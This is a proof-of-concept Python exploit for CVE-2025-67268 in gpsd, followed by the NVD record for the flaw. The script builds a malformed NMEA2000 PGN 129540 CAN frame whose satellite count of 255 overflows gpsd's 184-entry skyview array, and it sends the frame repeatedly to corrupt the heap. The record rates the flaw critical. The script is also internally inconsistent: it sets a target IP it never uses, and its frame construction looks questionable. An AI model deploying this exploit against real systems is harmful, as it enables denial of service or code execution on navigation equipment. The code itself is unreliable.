CVE-2025-67268

# CVE-2025-67268 PoC - Malicious NMEA2000 PGN 129540 Packet # This PoC demonstrates the heap overflow in gpsd's NMEA2000 driver import socket import struct def create_malicious_pgn129540(satellite_count=255): """ Construct a malicious NMEA2000 PGN 129540 CAN frame PGN 129540: GNSS Satellites in View """ # CAN ID for PGN 129540 (Priority 3, PGN 129540, Source 0x00) can_id = (3 << 26) | (129540 << 8) | 0x00 # Data Length Code (DLC) - max 8 bytes for standard CAN dlc = 8 # Payload construction # Byte 0-1: Number of satellites (0-255, we use >184 to trigger overflow) # Bytes 2-7: Additional satellite data data = struct.pack('<H', satellite_count) # Satellite count data += b'\x00' * 6 # Padding/additional data # Pad to 8 bytes data = data.ljust(8, b'\x00') return can_id, dlc, data def send_malicious_packet(target_ip, can_interface='can0'): """ Send malicious CAN frame to trigger gpsd vulnerability """ try: sock = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) sock.bind((can_interface,)) can_id, dlc, data = create_malicious_pgn129540(255) # Construct raw CAN frame can_frame = struct.pack('<IBBBBBBBB', can_id, dlc, *data) sock.send(can_frame) print(f"[+] Sent malicious PGN 129540 packet with {255} satellites") print(f"[+] Expected skyview array size: 184") print(f"[+] This will cause heap overflow in gpsd") except Exception as e: print(f"[-] Error: {e}") finally: sock.close() if __name__ == '__main__': # Target configuration TARGET_IP = '192.168.1.100' # gpsd server IP print("CVE-2025-67268 PoC - gpsd heap overflow in driver_nmea2000.c") print("=" * 60) # Send multiple packets to increase exploit reliability for i in range(5): send_malicious_packet(TARGET_IP)

{"cve": {"id": "CVE-2025-67268", "sourceIdentifier": "[email protected]", "published": "2026-01-02T16:17:00.990", "lastModified": "2026-01-12T15:33:45.577", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "gpsd before commit dc966aa contains a heap-based out-of-bounds write vulnerability in the drivers/driver_nmea2000.c file. The hnd_129540 function, which handles NMEA2000 PGN 129540 (GNSS Satellites in View) packets, fails to validate the user-supplied satellite count against the size of the skyview array (184 elements). This allows an attacker to write beyond the bounds of the array by providing a satellite count up to 255, leading to memory corruption, Denial of Service (DoS), and potentially arbitrary code execution."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-122"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gpsd_project:gpsd:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.27.1", "matchCriteriaId": "8CBC8583-D71F-4E6F-AB7D-51A3C15270B9"}]}]}], "references": [{"url": "https://github.com/Jaenact/gspd_cve/blob/main/CVE-2025-67268/README.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/ntpsec/gpsd/blob/master/drivers/driver_nmea2000.c", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/ntpsec/gpsd/commit/dc966aa74c075d0a6535811d98628625cbfbe3f4", "source": "[email protected]", "tags": ["Patch"]}]}}